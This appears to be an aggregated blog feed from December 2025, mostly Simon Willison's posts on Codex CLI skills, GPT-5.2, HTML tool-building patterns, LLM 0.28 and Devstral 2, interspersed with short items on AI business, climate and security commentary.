Here's ChatGPT's PDF in that tool.

(I am very excited about Kākāpō breeding season this year.)

The reason it took so long is that it was fastidious about looking at and tweaking its own work. I appreciated that at one point it tried rendering the PDF and noticed that the macrons in kākāpō were not supported by the chosen font, so it switched to something else:

Skills in Codex CLI

Meanwhile, two weeks ago OpenAI's open source Codex CLI tool landed a PR titled feat: experimental support for skills.md. The most recent docs for that are in docs/skills.md.

The documentation suggests that any folder in ~/.codex/skills will be treated as a skill.

I dug around and found the code that generates the prompt that drives the skill system in codex-rs/core/src/skills/render.rs - here's a Gist with a more readable version of that prompt.

I used Claude Opus 4.5's skill authoring skill to create this skill for creating Datasette plugins, then installed it into my Codex CLI skills folder like this:

git clone https://github.com/datasette/skill \
  ~/.codex/skills/datasette-plugin

You have to run Codex with the --enable skills option. I ran this:

cd /tmp
mkdir datasette-cowsay
cd datasette-cowsay
codex --enable skills -m gpt-5.2

Then prompted:

list skills

And Codex replied:

- datasette-plugins — Writing Datasette plugins using Python + pluggy (file: /Users/simon/.codex/skills/datasette-plugin/SKILL.md)
- Discovery — How to find/identify available skills (no SKILL.md path provided in the list)

Then I said:

Write a Datasette plugin in this folder adding a /-/cowsay?text=hello page that displays a pre with cowsay from PyPI saying that text

It worked perfectly! Here's the plugin code it wrote and here's a copy of the full Codex CLI transcript, generated with my terminal-to-html tool.

You can try that out yourself if you have uvx installed like this:

uvx --with https://github.com/simonw/datasette-cowsay/archive/refs/heads/main.zip \
  datasette

Then visit:

http://127.0.0.1:8001/-/cowsay?text=This+is+pretty+fun

Screenshot of that URL in Firefox, an ASCII art cow says This is pretty fun.

Skills are a keeper

When I first wrote about skills in October I said Claude Skills are awesome, maybe a bigger deal than MCP. The fact that it's just turned December and OpenAI have already leaned into them in a big way reinforces to me that I called that one correctly.

Skills are based on a very light specification, if you could even call it that, but I still think it would be good for these to be formally documented somewhere. This could be a good initiative for the new Agentic AI Foundation (previously) to take on.

Tags: pdf, ai, kakapo, openai, prompt-engineering, generative-ai, chatgpt, llms, ai-assisted-programming, anthropic, coding-agents, gpt-5, codex-cli, skills

Why Disney just put $1 billion into OpenAI

Fri, 12 Dec 2025 21:59:42 +0000 from Pivot to AI

The Walt Disney Company has invested $1 billion into OpenAI, and it’s also licensed Disney characters for OpenAI’s Sora video generator for three years. [press release] If any of the eight-second Sora-generated clips are usable, they’ll be deployed as space-filler on Disney+ streaming, to see if Disney can save a penny on paying human animators. […]

LLM 0.28

2025-12-12T20:20:14+00:00 from Simon Willison's Weblog

LLM 0.28

I released a new version of my LLM Python library and CLI tool for interacting with Large Language Models. Highlights from the release notes:

New OpenAI models: gpt-5.1, gpt-5.1-chat-latest, gpt-5.2 and gpt-5.2-chat-latest. #1300, #1317

When fetching URLs as fragments using llm -f URL, the request now includes a custom user-agent header: llm/VERSION (https://llm.datasette.io/). #1309

Fixed a bug where fragments were not correctly registered with their source when using llm chat. Thanks, Giuseppe Rota. #1316

Fixed some file descriptor leak warnings. Thanks, Eric Bloch. #1313

Type annotations for the OpenAI Chat, AsyncChat and Completion execute() methods. Thanks, Arjan Mossel. #1315

The project now uses uv and dependency groups for development. See the updated contributing documentation. #1318

That last bullet point about uv relates to the dependency groups pattern I wrote about in a recent TIL. I'm currently working through applying it to my other projects - the net result is that running the test suite is as simple as doing:

git clone https://github.com/simonw/llm
cd llm
uv run pytest

The new dev dependency group defined in pyproject.toml is automatically installed by uv run in a new virtual environment which means everything needed to run pytest is available without needing to add any extra commands.

Tags: projects, python, ai, annotated-release-notes, generative-ai, llms, llm, uv

At a Marine Field Station, Rising Seas Force an Inevitable Retreat

2025-12-12T10:56:00-05:00 from Yale E360

The scientists at a New Jersey marine station are conducting a sobering experiment: monitoring the destruction of their facility from rising waters. Oscar-winning filmmaker Thomas Lennon shows how the researchers are working to produce useful science before they must leave.

Read more on E360 →

Dozens of Countries See Their Economy Grow as Emissions Fall

2025-12-12T06:07:00-05:00 from Yale E360

A growing number of countries are showing that it is possible to achieve growth while also cutting emissions.

Read more on E360 →

Meeting my younger self

2025-12-12T10:30:02+00:00 from alexwlchan

I reviewed 150,000 fragments of my online life, and I was reminded of the friends I found, the mistakes I made, and the growth I gained.

What goes into a well-formed Unix syslog entry

2025-12-12T04:54:47Z from Chris's Wiki :: blog

GPT-5.2

2025-12-11T23:58:04+00:00 from Simon Willison's Weblog

OpenAI reportedly declared a "code red" on the 1st of December in response to increasingly credible competition from the likes of Google's Gemini 3. It's less than two weeks later and they just announced GPT-5.2, calling it "the most capable model series yet for professional knowledge work".

Key characteristics of GPT-5.2

The new model comes in two variants: GPT-5.2 and GPT-5.2 Pro. There's no Mini variant yet.

GPT-5.2 is available via their UI in both "instant" and "thinking" modes, presumably still corresponding to the API concept of different reasoning effort levels.

The knowledge cut-off date for both variants is now August 31st 2025. This is significant - GPT 5.1 and 5 were both Sep 30, 2024 and GPT-5 mini was May 31, 2024.

Both of the 5.2 models have a 400,000 token context window and 128,000 max output tokens - no different from 5.1 or 5.

Pricing wise 5.2 is a rare increase - it's 1.4x the cost of GPT 5.1, at $1.75/million input and $14/million output. GPT-5.2 Pro is $21.00/million input and a hefty $168.00/million output, putting it up there with their previous most expensive models o1 Pro and GPT-4.5.

So far the main benchmark results we have are self-reported by OpenAI. The most interesting ones are a 70.9% score on their GDPval "Knowledge work tasks" benchmark (GPT-5 got 38.8%) and a 52.9% on ARC-AGI-2 (up from 17.6% for GPT-5.1 Thinking).

The ARC Prize Twitter account provided this interesting note on the efficiency gains for GPT-5.2 Pro

A year ago, we verified a preview of an unreleased version of @OpenAI o3 (High) that scored 88% on ARC-AGI-1 at est. $4.5k/task

Today, we’ve verified a new GPT-5.2 Pro (X-High) SOTA score of 90.5% at $11.64/task

This represents a ~390X efficiency improvement in one year

GPT-5.2 can be accessed in OpenAI's Codex CLI tool like this:

codex -m gpt-5.2

There are three new API models:

gpt-5.2 - I think this is what you get if you select "GPT-5.2 Thinking" in ChatGPT but I'm a little confused.
gpt-5.2-chat-latest - the model used by ChatGPT for "GPT-5.2 Instant" mode. It's priced the same as GPT-5.2 but has a reduced 128,000 context window with 16,384 max output tokens.
gpt-5.2-pro

OpenAI have published a new GPT-5.2 Prompting Guide. An interesting note from that document is that compaction can now be run with a new dedicated server-side API:

For long-running, tool-heavy workflows that exceed the standard context window, GPT-5.2 with Reasoning supports response compaction via the /responses/compact endpoint. Compaction performs a loss-aware compression pass over prior conversation state, returning encrypted, opaque items that preserve task-relevant information while dramatically reducing token footprint. This allows the model to continue reasoning across extended workflows without hitting context limits.

It's better at vision

One note from the announcement that caught my eye:

GPT‑5.2 Thinking is our strongest vision model yet, cutting error rates roughly in half on chart reasoning and software interface understanding.

I had disappointing results from GPT-5 on an OCR task a while ago. I tried it against GPT-5.2 and it did much better:

llm -m gpt-5.2 ocr -a https://static.simonwillison.net/static/2025/ft.jpeg

Here's the result from that, which cost 1,520 input and 1,022 for a total of 1.6968 cents.

Rendering some pelicans

For my classic "Generate an SVG of a pelican riding a bicycle" test:

llm -m gpt-5.2 "Generate an SVG of a pelican riding a bicycle"

And for the more advanced alternative test, which tests instruction following in a little more depth:

llm -m gpt-5.2 "Generate an SVG of a California brown pelican riding a bicycle. The bicycle
must have spokes and a correctly shaped bicycle frame. The pelican must have its
characteristic large pouch, and there should be a clear indication of feathers.
The pelican must be clearly pedaling the bicycle. The image should show the full
breeding plumage of the California brown pelican."

Update 14th December 2025: I used GPT-5.2 running in Codex CLI to port a complex Python library to JavaScript. It ran without interference for nearly four hours and completed a complex task exactly to my specification.

Tags: ai, openai, generative-ai, llms, llm, pelican-riding-a-bicycle, llm-release, gpt-5

Let’s power AI with supersonic jet engine turbines!

Thu, 11 Dec 2025 23:27:17 +0000 from Pivot to AI

Boom Supersonic is a jet plane startup. They want to bring back the days of Concorde and fly supersonic planes around the world! With massive expense and inefficiency. Boom brags how they have “preorders” for 130 planes, including Japan Airlines preordering 20 planes in … 2017. Zero planes have been built. But it’s only been […]

Note published on December 11, 2025 at 10:12 PM UTC

2025-12-11T22:12:37+00:00 from Molly White's activity feed

A Stock Price Is Not a Prediction

Thu, 11 Dec 2025 19:03:09 GMT from Matt Levine - Bloomberg Opinion Columnist

Also Architects of AI, debanking risk, dentists on the investment committee and fistfights with regulators.

Understanding vs. impact: the paradox of how to spend my time

Thu, 11 Dec 2025 17:49:23 +0000 from Shtetl-Optimized

Not long ago William MacAskill, the founder of the Effective Altruist movement, visited Austin, where I got to talk with him in person for the first time. I was a fan of his book What We Owe the Future, and found him as thoughtful and eloquent face-to-face as I did on the page. Talking to […]

To Feed Data Centers, Pennsylvania Faces a New Fracking Surge

2025-12-11T07:08:00-05:00 from Yale E360

A rash of data centers planned for western Pennsylvania has residents and environmentalists on edge. The sprawling complexes will be powered by plants that burn fracked natural gas, whose production has caused air and water pollution in the region and has known health risks.

Read more on E360 →

Noticing a shift in Python idioms, or my use of them

2025-12-11T03:15:11Z from Chris's Wiki :: blog

Department of Defense goes to war by AI chatbot

Wed, 10 Dec 2025 23:08:38 +0000 from Pivot to AI

I got a tip yesterday from an anonymous US army officer that the US government was about to break new ground in authoritarian dumbassery. The officer had logged into his work computer in the morning, and got a popup: GenAI.mil. Victory belongs to those who embrace real innovation, not the antiquated systems of a bygone […]

Read "The Reverse-Centaur's Guide to Criticizing AI"

2025-12-10T21:25:29+00:00 from Molly White's activity feed

Useful patterns for building HTML tools

2025-12-10T21:00:59+00:00 from Simon Willison's Weblog

I've started using the term HTML tools to refer to HTML applications that I've been building which combine HTML, JavaScript, and CSS in a single file and use them to provide useful functionality. I have built over 150 of these in the past two years, almost all of them written by LLMs. This article presents a collection of useful patterns I've discovered along the way.

First, some examples to show the kind of thing I'm talking about:

svg-render renders SVG code to downloadable JPEGs or PNGs
pypi-changelog lets you generate (and copy to clipboard) diffs between different PyPI package releases.
bluesky-thread provides a nested view of a discussion thread on Bluesky.

These are some of my recent favorites. I have dozens more like this that I use on a regular basis.

You can explore my collection on tools.simonwillison.net - the by month view is useful for browsing the entire collection.

If you want to see the code and prompts, almost all of the examples in this post include a link in their footer to "view source" on GitHub. The GitHub commits usually contain either the prompt itself or a link to the transcript used to create the tool.

The anatomy of an HTML tool

These are the characteristics I have found to be most productive in building tools of this nature:

A single file: inline JavaScript and CSS in a single HTML file means the least hassle in hosting or distributing them, and crucially means you can copy and paste them out of an LLM response.
Avoid React, or anything with a build step. The problem with React is that JSX requires a build step, which makes everything massively less convenient. I prompt "no react" and skip that whole rabbit hole entirely.
Load dependencies from a CDN. The fewer dependencies the better, but if there's a well known library that helps solve a problem I'm happy to load it from CDNjs or jsdelivr or similar.
Keep them small. A few hundred lines means the maintainability of the code doesn't matter too much: any good LLM can read them and understand what they're doing, and rewriting them from scratch with help from an LLM takes just a few minutes.

The end result is a few hundred lines of code that can be cleanly copied and pasted into a GitHub repository.

Prototype with Artifacts or Canvas

The easiest way to build one of these tools is to start in ChatGPT or Claude or Gemini. All three have features where they can write a simple HTML+JavaScript application and show it to you directly.

Claude calls this "Artifacts", ChatGPT and Gemini both call it "Canvas". Claude has the feature enabled by default, ChatGPT and Gemini may require you to toggle it on in their "tools" menus.

Try this prompt in Gemini or ChatGPT:

Build a canvas that lets me paste in JSON and converts it to YAML. No React.

Or this prompt in Claude:

Build an artifact that lets me paste in JSON and converts it to YAML. No React.

I always add "No React" to these prompts, because otherwise they tend to build with React, resulting in a file that is harder to copy and paste out of the LLM and use elsewhere. I find that attempts which use React take longer to display (since they need to run a build step) and are more likely to contain crashing bugs for some reason, especially in ChatGPT.

All three tools have "share" links that provide a URL to the finished application. Examples:

ChatGPT JSON to YAML Canvas made with GPT-5.1 Thinking - here's the full ChatGPT transcript
Claude JSON to YAML Artifact made with Claude Opus 4.5 - here's the full Claude transcript
Gemini JSON to YAML Canvas made with Gemini 3 Pro - here's the full Gemini transcript

Switch to a coding agent for more complex projects

Coding agents such as Claude Code and Codex CLI have the advantage that they can test the code themselves while they work on it using tools like Playwright. I often upgrade to one of those when I'm working on something more complicated, like my Bluesky thread viewer tool shown above.

I also frequently use asynchronous coding agents like Claude Code for web to make changes to existing tools. I shared a video about that in Building a tool to copy-paste share terminal sessions using Claude Code for web.

Claude Code for web and Codex Cloud run directly against my simonw/tools repo, which means they can publish or upgrade tools via Pull Requests (here are dozens of examples) without me needing to copy and paste anything myself.

Load dependencies from CDNs

Any time I use an additional JavaScript library as part of my tool I like to load it from a CDN.

The three major LLM platforms support specific CDNs as part of their Artifacts or Canvas features, so often if you tell them "Use PDF.js" or similar they'll be able to compose a URL to a CDN that's on their allow-list.

Sometimes you'll need to go and look up the URL on cdnjs or jsDelivr and paste it into the chat.

CDNs like these have been around for long enough that I've grown to trust them, especially for URLs that include the package version.

The alternative to CDNs is to use npm and have a build step for your projects. I find this reduces my productivity at hacking on individual tools and makes it harder to self-host them.

Host them somewhere else

I don't like leaving my HTML tools hosted by the LLM platforms themselves for a couple of reasons. First, LLM platforms tend to run the tools inside a tight sandbox with a lot of restrictions. They're often unable to load data or images from external URLs, and sometimes even features like linking out to other sites are disabled.

The end-user experience often isn't great either. They show warning messages to new users, often take additional time to load and delight in showing promotions for the platform that was used to create the tool.

They're also not as reliable as other forms of static hosting. If ChatGPT or Claude are having an outage I'd like to still be able to access the tools I've created in the past.

Being able to easily self-host is the main reason I like insisting on "no React" and using CDNs for dependencies - the absence of a build step makes hosting tools elsewhere a simple case of copying and pasting them out to some other provider.

My preferred provider here is GitHub Pages because I can paste a block of HTML into a file on github.com and have it hosted on a permanent URL a few seconds later. Most of my tools end up in my simonw/tools repository which is configured to serve static files at tools.simonwillison.net.

Take advantage of copy and paste

One of the most useful input/output mechanisms for HTML tools comes in the form of copy and paste.

I frequently build tools that accept pasted content, transform it in some way and let the user copy it back to their clipboard to paste somewhere else.

Copy and paste on mobile phones is fiddly, so I frequently include "Copy to clipboard" buttons that populate the clipboard with a single touch.

Most operating system clipboards can carry multiple formats of the same copied data. That's why you can paste content from a word processor in a way that preserves formatting, but if you paste the same thing into a text editor you'll get the content with formatting stripped.

These rich copy operations are available in JavaScript paste events as well, which opens up all sorts of opportunities for HTML tools.

hacker-news-thread-export lets you paste in a URL to a Hacker News thread and gives you a copyable condensed version of the entire thread, suitable for pasting into an LLM to get a useful summary.
paste-rich-text lets you copy from a page and paste to get the HTML - particularly useful on mobile where view-source isn't available.
alt-text-extractor lets you paste in images and then copy out their alt text.

Build debugging tools

The key to building interesting HTML tools is understanding what's possible. Building custom debugging tools is a great way to explore these options.

clipboard-viewer is one of my most useful. You can paste anything into it (text, rich text, images, files) and it will loop through and show you every type of paste data that's available on the clipboard.

Clipboard Format Viewer. Paste anywhere on the page (Ctrl+V or Cmd+V). This shows text/rtf with a bunch of weird code, text/plain with some pasted HTML diff and a Clipboard Event Information panel that says Event type: paste, Formats available: text/rtf, text/plain, 0 files reported and 2 clipboard items reported.

This was key to building many of my other tools, because it showed me the invisible data that I could use to bootstrap other interesting pieces of functionality.

More debugging examples:

keyboard-debug shows the keys (and KeyCode values) currently being held down.
cors-fetch reveals if a URL can be accessed via CORS.
exif displays EXIF data for a selected photo.

Persist state in the URL

HTML tools may not have access to server-side databases for storage but it turns out you can store a lot of state directly in the URL.

I like this for tools I may want to bookmark or share with other people.

icon-editor is a custom 24x24 icon editor I built to help hack on icons for the GitHub Universe badge. It persists your in-progress icon design in the URL so you can easily bookmark and share it.

Use localStorage for secrets or larger state

The localStorage browser API lets HTML tools store data persistently on the user's device, without exposing that data to the server.

I use this for larger pieces of state that don't fit comfortably in a URL, or for secrets like API keys which I really don't want anywhere near my server - even static hosts might have server logs that are outside of my influence.

word-counter is a simple tool I built to help me write to specific word counts, for things like conference abstract submissions. It uses localStorage to save as you type, so your work isn't lost if you accidentally close the tab.
render-markdown uses the same trick - I sometimes use this one to craft blog posts and I don't want to lose them.
haiku is one of a number of LLM demos I've built that request an API key from the user (via the prompt() function) and then store that in localStorage. This one uses Claude Haiku to write haikus about what it can see through the user's webcam.

Collect CORS-enabled APIs

CORS stands for Cross-origin resource sharing. It's a relatively low-level detail which controls if JavaScript running on one site is able to fetch data from APIs hosted on other domains.

APIs that provide open CORS headers are a goldmine for HTML tools. It's worth building a collection of these over time.

Here are some I like:

iNaturalist for fetching sightings of animals, including URLs to photos
PyPI for fetching details of Python packages
GitHub because anything in a public repository in GitHub has a CORS-enabled anonymous API for fetching that content from the raw.githubusercontent.com domain, which is behind a caching CDN so you don't need to worry too much about rate limits or feel guilty about adding load to their infrastructure.
Bluesky for all sorts of operations
Mastodon has generous CORS policies too, as used by applications like phanpy.social

GitHub Gists are a personal favorite here, because they let you build apps that can persist state to a permanent Gist through making a cross-origin API call.

species-observation-map uses iNaturalist to show a map of recent sightings of a particular species.
zip-wheel-explorer fetches a .whl file for a Python package from PyPI, unzips it (in browser memory) and lets you navigate the files.
github-issue-to-markdown fetches issue details and comments from the GitHub API (including expanding any permanent code links) and turns them into copyable Markdown.
terminal-to-html can optionally save the user's converted terminal session to a Gist.
bluesky-quote-finder displays quotes of a specified Bluesky post, which can then be sorted by likes or by time.

LLMs can be called directly via CORS

All three of OpenAI, Anthropic and Gemini offer JSON APIs that can be accessed via CORS directly from HTML tools.

Unfortunately you still need an API key, and if you bake that key into your visible HTML anyone can steal it and use to rack up charges on your account.

I use the localStorage secrets pattern to store API keys for these services. This sucks from a user experience perspective - telling users to go and create an API key and paste it into a tool is a lot of friction - but it does work.

Some examples:

haiku uses the Claude API to write a haiku about an image from the user's webcam.
openai-audio-output generates audio speech using OpenAI's GPT-4o audio API.
gemini-bbox demonstrates Gemini 2.5's ability to return complex shaped image masks for objects in images, see Image segmentation using Gemini 2.5.

Don't be afraid of opening files

You don't need to upload a file to a server in order to make use of the <input type="file"> element. JavaScript can access the content of that file directly, which opens up a wealth of opportunities for useful functionality.

Some examples:

ocr is the first tool I built for my collection, described in Running OCR against PDFs and images directly in your browser. It uses PDF.js and Tesseract.js to allow users to open a PDF in their browser which it then converts to an image-per-page and runs through OCR.
social-media-cropper lets you open (or paste in) an existing image and then crop it to common dimensions needed for different social media platforms - 2:1 for Twitter and LinkedIn, 1.4:1 for Substack etc.
ffmpeg-crop lets you open and preview a video file in your browser, drag a crop box within it and then copy out the ffmpeg command needed to produce a cropped copy on your own machine.

You can offer downloadable files too

An HTML tool can generate a file for download without needing help from a server.

The JavaScript library ecosystem has a huge range of packages for generating files in all kinds of useful formats.

svg-render lets the user download the PNG or JPEG rendered from an SVG.
social-media-cropper does the same for cropped images.
open-sauce-2025 is my alternative schedule for a conference that includes a downloadable ICS file for adding the schedule to your calendar. See Vibe scraping and vibe coding a schedule app for Open Sauce 2025 entirely on my phone for more on that project.

Pyodide can run Python code in the browser

Pyodide is a distribution of Python that's compiled to WebAssembly and designed to run directly in browsers. It's an engineering marvel and one of the most underrated corners of the Python world.

It also cleanly loads from a CDN, which means there's no reason not to use it in HTML tools!

Even better, the Pyodide project includes micropip - a mechanism that can load extra pure-Python packages from PyPI via CORS.

pyodide-bar-chart demonstrates running Pyodide, Pandas and matplotlib to render a bar chart directly in the browser.
numpy-pyodide-lab is an experimental interactive tutorial for Numpy.
apsw-query demonstrates the APSW SQLite library running in a browser, using it to show EXPLAIN QUERY plans for SQLite queries.

WebAssembly opens more possibilities

Pyodide is possible thanks to WebAssembly. WebAssembly means that a vast collection of software originally written in other languages can now be loaded in HTML tools as well.

Squoosh.app was the first example I saw that convinced me of the power of this pattern - it makes several best-in-class image compression libraries available directly in the browser.

I've used WebAssembly for a few of my own tools:

ocr uses the pre-existing Tesseract.js WebAssembly port of the Tesseract OCR engine.
sloccount is a port of David Wheeler's Perl and C SLOCCount utility to the browser, using a big ball of WebAssembly duct tape. More details here.
micropython is my experiment using @micropython/micropython-webassembly-pyscript from NPM to run Python code with a smaller initial download than Pyodide.

Remix your previous tools

The biggest advantage of having a single public collection of 100+ tools is that it's easy for my LLM assistants to recombine them in interesting ways.

Sometimes I'll copy and paste a previous tool into the context, but when I'm working with a coding agent I can reference them by name - or tell the agent to search for relevant examples before it starts work.

The source code of any working tool doubles as clear documentation of how something can be done, including patterns for using editing libraries. An LLM with one or two existing tools in their context is much more likely to produce working code.

I built pypi-changelog by telling Claude Code:

Look at the pypi package explorer tool

And then, after it had found and read the source code for zip-wheel-explorer:

Build a new tool pypi-changelog.html which uses the PyPI API to get the wheel URLs of all available versions of a package, then it displays them in a list where each pair has a "Show changes" clickable in between them - clicking on that fetches the full contents of the wheels and displays a nicely rendered diff representing the difference between the two, as close to a standard diff format as you can get with JS libraries from CDNs, and when that is displayed there is a "Copy" button which copies that diff to the clipboard

Here's the full transcript.

See Running OCR against PDFs and images directly in your browser for another detailed example of remixing tools to create something new.

Record the prompt and transcript

I like keeping (and publishing) records of everything I do with LLMs, to help me grow my skills at using them over time.

For HTML tools I built by chatting with an LLM platform directly I use the "share" feature for those platforms.

For Claude Code or Codex CLI or other coding agents I copy and paste the full transcript from the terminal into my terminal-to-html tool and share that using a Gist.

In either case I include links to those transcripts in the commit message when I save the finished tool to my repository. You can see those in my tools.simonwillison.net colophon.

Go forth and build

I've had so much fun exploring the capabilities of LLMs in this way over the past year and a half, and building tools in this way has been invaluable in helping me understand both the potential for building tools with HTML and the capabilities of the LLMs that I'm building them with.

If you're interested in starting your own collection I highly recommend it! All you need to get started is a free GitHub repository with GitHub Pages enabled (Settings -> Pages -> Source -> Deploy from a branch -> main) and you can start copying in .html pages generated in whatever manner you like.

Bonus transcript: Here's how I used Claude Code and shot-scraper to add the screenshots to this post.

Tags: definitions, github, html, javascript, projects, tools, ai, webassembly, generative-ai, llms, ai-assisted-programming, vibe-coding, coding-agents, claude-code

The Normalization of Deviance in AI

2025-12-10T20:18:58+00:00 from Simon Willison's Weblog

The Normalization of Deviance in AI

This thought-provoking essay from Johann Rehberger directly addresses something that I’ve been worrying about for quite a while: in the absence of any headline-grabbing examples of prompt injection vulnerabilities causing real economic harm, is anyone going to care?

Johann describes the concept of the “Normalization of Deviance” as directly applying to this question.

Coined by Diane Vaughan, the key idea here is that organizations that get away with “deviance” - ignoring safety protocols or otherwise relaxing their standards - will start baking that unsafe attitude into their culture. This can work fine… until it doesn’t. The Space Shuttle Challenger disaster has been partially blamed on this class of organizational failure.

As Johann puts it:

In the world of AI, we observe companies treating probabilistic, non-deterministic, and sometimes adversarial model outputs as if they were reliable, predictable, and safe.

Vendors are normalizing trusting LLM output, but current understanding violates the assumption of reliability.

The model will not consistently follow instructions, stay aligned, or maintain context integrity. This is especially true if there is an attacker in the loop (e.g indirect prompt injection).

However, we see more and more systems allowing untrusted output to take consequential actions. Most of the time it goes well, and over time vendors and organizations lower their guard or skip human oversight entirely, because “it worked last time.”

This dangerous bias is the fuel for normalization: organizations confuse the absence of a successful attack with the presence of robust security.

Tags: security, ai, prompt-injection, generative-ai, llms, johann-rehberger, ai-ethics

The Warner Deal Will Take a While

Wed, 10 Dec 2025 18:36:24 GMT from Matt Levine - Bloomberg Opinion Columnist

Also M&A AI data, trillion-dollar IPOs and good TV is bad for stocks.

Dark mode

2025-12-10T16:05:34+00:00 from Simon Willison's Weblog

I've never been particularly invested dark v.s. light mode but I get enough people complaining that this site is "blinding" that I decided to see if Claude Code for web could produce a useful dark mode from my existing CSS. It did a decent job, using CSS properties, @media (prefers-color-scheme: dark) and a data-theme="dark" attribute based on this prompt:

Add a dark theme which is triggered by user media preferences but can also be switched on using localStorage - then put a little icon in the footer for toggling it between default auto, forced regular and forced dark mode

The site defaults to picking up the user's preferences, but there's also a toggle in the footer which switches between auto, forced-light and forced-dark. Here's an animated demo:

This site on mobile. Clicking the icon in the footer switches to a black background with readable text.

I had Claude Code make me that GIF from two static screenshots - it used this ImageMagick recipe:

magick -delay 300 -loop 0 one.png two.png \
    -colors 128 -layers Optimize dark-mode.gif

The CSS ended up with some duplication due to the need to handle both the media preference and the explicit user selection. We fixed that with Cog.

Tags: css, coding-agents, ai-assisted-programming, claude, claude-code, design, llms, ai, generative-ai

Why AGI Will Not Happen

Wed, 10 Dec 2025 15:05:30 +0000 from Tim Dettmers

If you are reading this, you probably have strong opinions about AGI, superintelligence, and the future of AI. Maybe you believe we are on the cusp of a transformative breakthrough. Maybe you are skeptical. This blog post is for those who want to think more carefully about these claims and examine them from a perspective […]

The post Why AGI Will Not Happen appeared first on Tim Dettmers.

Auto-grading decade-old Hacker News discussions with hindsight

2025-12-10T15:00:00+00:00 from karpathy

A vibe coding thought exercise on what it might look like for LLMs to scour human historical data at scale and in retrospect.

Hard problems in social media archiving

2025-12-10T11:43:25+00:00 from alexwlchan

Preserving social media is easier said than done. What makes it so difficult for institutions to back up the Internet?

EPA Removes Information on Human Drivers of Warming from Its Website

2025-12-10T06:10:00-05:00 from Yale E360

The Environmental Protection Agency has scrubbed from its website information on how humans are driving warming. A web page that once explored the central role of fossil fuels in heating the planet now only mentions natural drivers of climate change.

Read more on E360 →

Lingering bad DNS traffic to our authoritative DNS server

2025-12-10T03:53:48Z from Chris's Wiki :: blog

10 Years of Let's Encrypt

2025-12-10T00:34:15+00:00 from Simon Willison's Weblog

10 Years of Let's Encrypt

Internet Security Research Group co-founder and Executive Director Josh Aas:

On September 14, 2015, our first publicly-trusted certificate went live. [...] Today, Let’s Encrypt is the largest certificate authority in the world in terms of certificates issued, the ACME protocol we helped create and standardize is integrated throughout the server ecosystem, and we’ve become a household name among system administrators. We’re closing in on protecting one billion web sites.

Their growth rate and numbers are wild:

In March 2016, we issued our one millionth certificate. Just two years later, in September 2018, we were issuing a million certificates every day. In 2020 we reached a billion total certificates issued and as of late 2025 we’re frequently issuing ten million certificates per day.

According to their stats the amount of Firefox traffic protected by HTTPS doubled from 39% at the start of 2016 to ~80% today. I think it's difficult to over-estimate the impact Let's Encrypt has had on the security of the web.

Via Hacker News

Tags: https, security

Devstral 2

2025-12-09T23:58:27+00:00 from Simon Willison's Weblog

Devstral 2

Two new models from Mistral today: Devstral 2 and Devstral Small 2 - both focused on powering coding agents such as Mistral's newly released Mistral Vibe which I wrote about earlier today.

Devstral 2: SOTA open model for code agents with a fraction of the parameters of its competitors and achieving 72.2% on SWE-bench Verified.

Up to 7x more cost-efficient than Claude Sonnet at real-world tasks.

Devstral 2 is a 123B model released under a janky license - it's "modified MIT" where the modification is:

You are not authorized to exercise any rights under this license if the global consolidated monthly revenue of your company (or that of your employer) exceeds $20 million (or its equivalent in another currency) for the preceding month. This restriction in (b) applies to the Model and any derivatives, modifications, or combined works based on it, whether provided by Mistral AI or by a third party. [...]

Mistral Small 2 is under a proper Apache 2 license with no weird strings attached. It's a 24B model which is 51.6GB on Hugging Face and should quantize to significantly less.

I tried out the larger model via my llm-mistral plugin like this:

llm install llm-mistral
llm mistral refresh
llm -m mistral/devstral-2512 "Generate an SVG of a pelican riding a bicycle"

Bicycle looks a bit like a cybertruck

For a ~120B model that one is pretty good!

Here's the same prompt with -m mistral/labs-devstral-small-2512 for the API hosted version of Devstral Small 2:

A small white pelican on what looks more like a child's cart.

Again, a decent result given the small parameter size. For comparison, here's what I got for the 24B Mistral Small 3.2 earlier this year.

Tags: ai, generative-ai, llms, llm, mistral, pelican-riding-a-bicycle, llm-release, janky-licenses

Under the hood of Canada Spends with Brendan Samek

2025-12-09T23:52:05+00:00 from Simon Willison's Weblog

I talked to Brendan Samek about Canada Spends, a project from Build Canada that makes Canadian government financial data accessible and explorable using a combination of Datasette, a neat custom frontend, Ruby ingestion scripts, sqlite-utils and pieces of LLM-powered PDF extraction.

Here's the video on YouTube.

Sections within that video:

02:57 Data sources and the PDF problem
05:51 Crowdsourcing financial data across Canada
07:27 Datasette demo: Search and facets
12:33 Behind the scenes: Ingestion code
17:24 Data quality horror stories
20:46 Using Gemini to extract PDF data
25:24 Why SQLite is perfect for data distribution

Build Canada and Canada Spends

Build Canada is a volunteer-driven non-profit that launched in February 2025 - here's some background information on the organization, which has a strong pro-entrepreneurship and pro-technology angle.

Canada Spends is their project to make Canadian government financial data more accessible and explorable. It includes a tax sources and sinks visualizer and a searchable database of government contracts, plus a collection of tools covering financial data from different levels of government.

Datasette for data exploration

The project maintains a Datasette instance at api.canadasbilding.com containing the data they have gathered and processed from multiple data sources - currently more than 2 million rows plus a combined search index across a denormalized copy of that data.

Processing PDFs

The highest quality government financial data comes from the audited financial statements that every Canadian government department is required to publish. As is so often the case with government data, these are usually published as PDFs.

Brendan has been using Gemini to help extract data from those PDFs. Since this is accounting data the numbers can be summed and cross-checked to help validate the LLM didn't make any obvious mistakes.

Microsoft cuts AI sales quotas, stock drops 3%

Tue, 09 Dec 2025 22:28:56 +0000 from Pivot to AI

Microsoft loves its AI, and wants you to love it too! But it had to lower sales quotas for AI agent software Foundry — because so many of its salespeople missed their quota for Q2 2025: [Information, paywalled; Ars Technica; Reuters] Less than a fifth of salespeople in that unit met their Foundry sales growth […]

Agentic AI Foundation

2025-12-09T22:24:48+00:00 from Simon Willison's Weblog

Agentic AI Foundation

Announced today as a new foundation under the parent umbrella of the Linux Foundation (see also the OpenJS Foundation, Cloud Native Computing Foundation, OpenSSF and many more).

The AAIF was started by a heavyweight group of "founding platinum members" ($350,000): AWS, Anthropic, Block, Bloomberg, Cloudflare, Google, Microsoft, and OpenAI. The stated goal is to provide "a neutral, open foundation to ensure agentic AI evolves transparently and collaboratively".

Anthropic have donated Model Context Protocol to the new foundation, OpenAI donated AGENTS.md, Block donated goose (their open source, extensible AI agent).

Personally the project I'd like to see most from an initiative like this one is a clear, community-managed specification for the OpenAI Chat Completions JSON API - or a close equivalent. There are dozens of slightly incompatible implementations of that not-quite-specification floating around already, it would be great to have a written spec accompanied by a compliance test suite.

Tags: open-source, standards, ai, openai, llms, anthropic, ai-agents, model-context-protocol

mistralai/mistral-vibe

